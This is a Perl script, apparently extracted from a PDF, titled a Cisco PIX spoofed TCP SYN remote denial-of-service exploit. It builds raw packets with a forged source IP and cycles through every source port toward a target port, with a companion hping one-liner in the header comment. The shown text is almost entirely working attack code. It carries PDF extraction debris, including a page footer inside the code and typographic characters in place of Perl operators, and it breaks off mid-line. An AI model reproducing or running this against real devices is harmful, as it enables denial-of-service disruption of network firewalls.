1 # The easy way by logic logidev@gmail.com (line 2) untested /str0ke
2 # hping −c 1 −S −s 31337 −k −b −p 22 10.0.xx.xxx
3
4 #!/usr/bin/perl
5 eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
6 eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@;
7 eval ("use Term::ProgressBar;");
8 die "[error] Term::ProgressBar perl module is not installed \n" if $@;
9 my $VERSION = "0.1";
10 print "$0, $PgmName, V $VERSION \n";
11 GetOptions (
12 "help" =>\$usage,
13 "device=s" => \$device,
14 "source=s" =>\$sourceip,
15 "dest=s"=>\$destip,
16 "sourcemac=s"=>\$sourcemac,
17 "destmac=s"=>\$destmac,
18 "port=n"=> \$tcpport,
19 );
20
21 ######################## Config option ####################
22
23 my $timeout = "0,1"; # Timeout
24
25 if ($usage) {&usage;}
26
27 if (!$device) {
28 $device= ’eth0’; # Network device
29 }
30
31 if (!$destmac) {print "Dest MAC not found \n"; &usage;}
32 if (!$sourceip) {print "Source IP not found \n"; &usage;}
33 if (!$destip) {print "Dest IP not found \n"; &usage;}
34 if (!$tcpport) {print "TCP port not found \n"; &usage;}
35
36 my $syn="1"; # TCP SYN SET
37 my $tcpdata = "TEST"; # TCP payload
38 my $count=0;
39
40 ######################################################
41
42 #Initialize Progres Bar
43 my $progress = Term::ProgressBar−>new(32768);
44 $progress−>minor(0);
45 $packet = new Net::RawIP;
46 $packet−> ethnew($device);
47
48
49 if (!$sourcemac) {
50 $packet −> ethset( dest => $destmac);
51 }else {
52 $packet −> ethset( source =>$sourcemac, dest => $destmac);
Page 1/3
Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit
Janis Vizulis
11/23/2005
53 }
54
55
56
57 for ($count=0; $count< 65537 ; $count++) {
58
59 $packet−>set({
60
61 ip => {
62 saddr => $sourceip,
63 daddr => $destip
64 },
65
66 tcp => {
67 check => 0x0010 , # TCP Packet Checksum 0 for auto correct
68 source => $count,
69 dest => $tcpport,
70 syn => $syn,
71 data => $tcpdata
72 }});
73 $packet−>ethsend($timeout);
74 #$packet−>s